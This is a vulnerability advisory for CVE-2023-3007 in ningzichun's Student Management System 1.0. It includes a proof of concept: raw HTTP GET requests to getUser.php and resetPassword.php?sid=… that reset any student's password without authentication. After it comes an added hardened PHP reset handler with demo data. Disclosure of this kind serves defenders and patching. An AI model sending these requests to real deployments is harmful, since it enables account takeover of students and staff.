
CVE-2023-3007: webray.com.cn/password_reset.md at main · Xor-Gerke/webray.com.cn

A vulnerability was found in ningzichun Student Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file resetPassword.php of the component Password Reset Handler. The manipulation of the argument sid leads to weak password recovery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230354 is the identifier assigned to this vulnerability.


student-management-system resetPassword.php user password reset

Exploit Title: student-management-system resetPassword.php user password reset
Exploit Author: [email protected] inc
Vendor Homepage: https://github.com/ningzichun/student-management-system
Software Link: https://github.com/ningzichun/student-management-system
Version: student-management-system 1.0
Tested on: Windows Server 2008 R2 Enterprise, Apache, MySQL

Description

The password-change step is not verified. Anyone can go directly to the final page where the password is modified and enter a new password there, so any user's password can be reset. student-management-system does not correctly filter the sid parameter of “resetPassword.php”, which lets anyone reset a password.

Payload used:

Test account: 201600012489
/resetPassword.php?sid=xxxx

Proof of Concept

  1. Open login.php source code.

  2. Request a getUser.php response.

    GET /student/admin/fun/getUser.php HTTP/1.1
    Host: 172.24.6.107:8081
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://172.24.6.107:8081
    Connection: close
    Referer: http://172.24.6.107:8081/student/?retry=1
    Cookie: PHPSESSID=
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache

  3. Request a resetPassword.php response.

    GET /student/admin/fun/resetPassword.php?sid=201600012489 HTTP/1.1
    Host: 172.24.6.107:8081
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://172.24.6.107:8081
    Connection: close
    Referer: http://172.24.6.107:8081/student/?retry=1
    Cookie: PHPSESSID=
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Cache-Control: no-cache

  4. User login
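
A hardened form of the reset handler, added here as an example; it is not code from the original report or from the student-management-system project. The function name handle_reset, the session keys, and the student table layout are assumptions. It shows the checks whose absence the report describes: an authenticated session, a non-GET method, a CSRF token, and a validated sid.

```php
<?php
// Added example: hardened reset handler. Session keys, table and column
// names are assumptions, not taken from the project's source.
declare(strict_types=1);

function handle_reset(array $session, string $method, array $post, PDO $db): int
{
    // 1. State-changing action: POST only, so a bare GET link does nothing.
    if ($method !== 'POST') {
        return 405;
    }
    // 2. Caller must hold an authenticated admin session (assumed key names).
    if (empty($session['user_id']) || ($session['role'] ?? '') !== 'admin') {
        return 403;
    }
    // 3. CSRF token bound to the session, compared in constant time.
    $token = $post['csrf'] ?? '';
    if (!is_string($token) || empty($session['csrf']) || !hash_equals($session['csrf'], $token)) {
        return 403;
    }
    // 4. sid must look like a student number before it reaches the database.
    $sid = $post['sid'] ?? '';
    $new = $post['new_password'] ?? '';
    if (!is_string($sid) || !preg_match('/^\d{6,20}$/', $sid) || !is_string($new) || strlen($new) < 12) {
        return 400;
    }
    // 5. Parameterised update; store a password hash, never the plaintext.
    $stmt = $db->prepare('UPDATE student SET password_hash = ? WHERE sid = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $sid]);
    return $stmt->rowCount() === 1 ? 200 : 404;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE student (sid TEXT PRIMARY KEY, password_hash TEXT)');
$db->exec("INSERT INTO student VALUES ('201600012489', 'old')");

$admin = ['user_id' => 1, 'role' => 'admin', 'csrf' => bin2hex(random_bytes(16))];
$form  = ['sid' => '201600012489', 'new_password' => 'correct horse battery', 'csrf' => $admin['csrf']];

var_dump(handle_reset([], 'GET', [], $db));         // unauthenticated GET, as in the report
var_dump(handle_reset([], 'POST', $form, $db));     // POST without a session
var_dump(handle_reset($admin, 'POST', $form, $db)); // authorised admin with valid token
```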
